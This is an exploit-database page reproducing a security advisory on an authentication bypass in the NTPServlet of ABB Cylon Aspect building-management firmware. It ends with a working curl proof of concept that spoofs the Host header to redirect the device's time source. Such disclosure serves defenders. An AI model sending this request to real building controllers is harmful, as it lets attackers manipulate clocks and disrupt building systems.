ABB Cylon Aspect 3.08.03 (MIX->NTPServlet) Time Manipulation

May 23, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title ABB Cylon Aspect 3.08.03 (MIX->NTPServlet) Time Manipulation
Exploit ID ZSL-2025-5943
Type zeroscience
Published 2025-05-22T00:00:00
Modified 2025-05-22T00:00:00

CVSS Information

CVSS Score 0.0
Severity NONE
Vector NONE

CVE Information

Exploit Description

Title: ABB Cylon Aspect 3.08.03 (MIX->NTPServlet) Time Manipulation Advisory ID: ZSL-2025-5943 Type: Local/Remote Impact: Security Bypass, Manipulation of Data,…

Exploit Code

ABB Cylon Aspect 3.08.03 (MIX->NTPServlet) Time Manipulation

Vendor: ABB Ltd.

Product web page: https://www.global.abb

Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio

Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management

and control solution designed to allow users seamless access to their

building data through standard building protocols including smart devices.

Desc: ABB Cylon Aspect MIX’s NTPServlet allows NTP config changes via the

Host: 127.0.0.1 bypass, writing attacker-controlled hosts to NTPTickers

and syncing the system clock. A malicious NTP server can manipulate time,

enabling DoS or time-based attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)

GNU/Linux 3.10.0 (x86_64)

GNU/Linux 2.6.32 (x86_64)

Intel(R) Atom(TM) Processor E3930 @ 1.30GHz

Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz

PHP/7.3.11

PHP/5.6.30

PHP/5.4.16

PHP/4.4.8

PHP/5.3.3

AspectFT Automation Application Server

lighttpd/1.4.32

lighttpd/1.4.18

Apache/2.2.15 (CentOS)

OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)

OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

@zeroscience

Advisory ID: ZSL-2025-5943

Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5943.php

21.04.2024

$ cat project

P R O J E C T

.|

| |

|’| ._____

___ | | |. |’ .—“|

_ .-‘ ‘-. | | .–‘| || | _| |

.-‘| _.| | || ‘-__ | | | || |

|’ | |. | || | | | | || |

____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____

░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░

░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ curl http://192.168.73.31:7226/servlets/NTPServlet \

> -H “Host: 127.0.0.1” \

> -d “hosts=1.2.3.4&pollinterval=60”

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.